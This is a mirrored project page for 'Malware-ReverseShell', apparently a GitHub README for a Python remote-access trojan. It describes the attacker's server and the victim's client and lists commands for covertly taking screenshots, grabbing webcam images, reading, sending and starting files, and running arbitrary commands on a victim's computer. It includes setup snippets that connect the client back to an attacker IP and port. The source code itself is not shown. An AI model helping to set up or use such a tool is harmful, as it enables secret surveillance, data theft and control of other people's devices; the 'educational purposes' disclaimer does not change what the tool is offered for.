SO业务编排>> Malware-ReverseShell>> 返回
项目作者: MartysHD

项目描述 :
Python reverse shell malware.
高级语言: Python
项目地址: git://github.com/MartysHD/Malware-ReverseShell.git
创建时间: 2019-06-11T18:48:58Z
项目社区:https://github.com/MartysHD/Malware-ReverseShell
开源协议:MIT License
下载


Malware-ReverseShell

This python malware-program is a presentation of how can reverse shell works.


Revershe shell is type of malware where device of victim is connected in background to attacker. This way attacker can remotely control victim’s computer, watch their activity, grab information and really anything that is in his desire.



Reverse shell malwares are divided into two main programs:

Server Side Program

Server side of the program belong to hacker/attacker.


Server program is started on specified ip address which can be as public as local with opened port. To this parameters is going to be victim connected. It is a console application so everything is happening inside of a console/terminal.


After successfully established connection attacker (server) can start sending pre-defined commands to victim (client). Some commands can be used before any client is connected (i named them server commands), but most of them are working only with connected client (server-client commands).

Make server running and listening for upcomming connections

Use console arguments

Show all possible commands/arguments

  1. python server.py --help

Set ip address

  1. python server.py -ip [ip address]

Set port

  1. python server.py -port [port]

If you don’t want to manually set your ip address, you can use these arguments:

Sets server on your local ip address

  1. python server.py -get-local-ip

Sets server on your public ip address

  1. python server.py -get-external-ip

Specify parameters in program

  1. ip = '192.168.1.136'
  2. port = 5000
  3. server = Server(ip, port)
  4. server.run()

Console Enviroment - Commands

When you’re in program after server’s been initialized and it is listening for connections in background you still use commands that are not relited to client. These commands are only affecting your running server program.


You can list through all possible commands with command list or print commands.

Server commands



print commands
  1. print commands / list


clear the screen

  1. clear


show ip address

  1. show ip


show port

  1. show port


show directory where screenshots are going to be saved

  1. show screenshots directory


show directory where webcam shots are going to be saved

  1. show webcam shots directory


save ip and port data

  1. save


set socket by client’s name

  1. set [clients id or name]


unset current selected user

  1. unset


print new connections

  1. wait


show all connected clients

  1. clients


rename client

  1. rename [oldname newname]


show name instead of path

  1. name mode


Server-client commands


These are the commands that are related to client and they are sent to client wich is responding on them.


You list through the connected clients with command client.


After this you can set a client with command set [client’s id or name] by clients id or name.


That’s it! You can now send all cool commands to client and just like that start crawling through victim’s computer, making screenshot, reading, sending or starting files etc. .

simple check if connection is all right with client

  1. check

request name from client

  1. get name

set and show client’s path instead of name

  1. path mode

change directory

  1. cd [options/directory]

list directory

  1. dir [options]

open web page by url

  1. web [url]

Get screenshot from client

-d -> directory where screenshots are going to be saved

-s -> set start number for saving screenshots

  1. screenshot [-d (directory), -s (start number)]

Get image from client’s webcam

  1. webcam

read and save file from client

  1. read [file]

send file

  1. send [file]

start and open file

  1. start [file]

reset connection with client

  1. reset

send any other command

  1. [command] -c

close the program

  1. close/exit/quit

Client Side Program

Before malware is started on client’s machine, it needs to be configure it with server ip and port on wich server is listening for connections.


Client’s program is going to overly trying to connect to this ip address and port.


After client is connected, everything is ready for attacker and he can start manipulating victim’s device.


Initialize client’s program by adding these cuple lines inside of client’s malware program:

  1. server_ip = '192.168.1.136'
  2. port = 5000
  3. name = 'my_brother'
  4. client = Client(server_ip, port, name)
  5. client.run()

In those examples I’ve used local ip address. Of course you can use public ip addresses but for that you need to have set up your own server with public ip address or without a public server you can try port forwarding (if you own public ip address from your isp) but be careful around that because there is a lot of security issues that can come.

Disclaimer


Code was written back in times when I had no knowledge about data structures, algorithms, clean code rules, etc.. Feel free to refactor / add new functionality and create pull request :).

This project was made for educational purposes only.


You are the only responsable for your actions!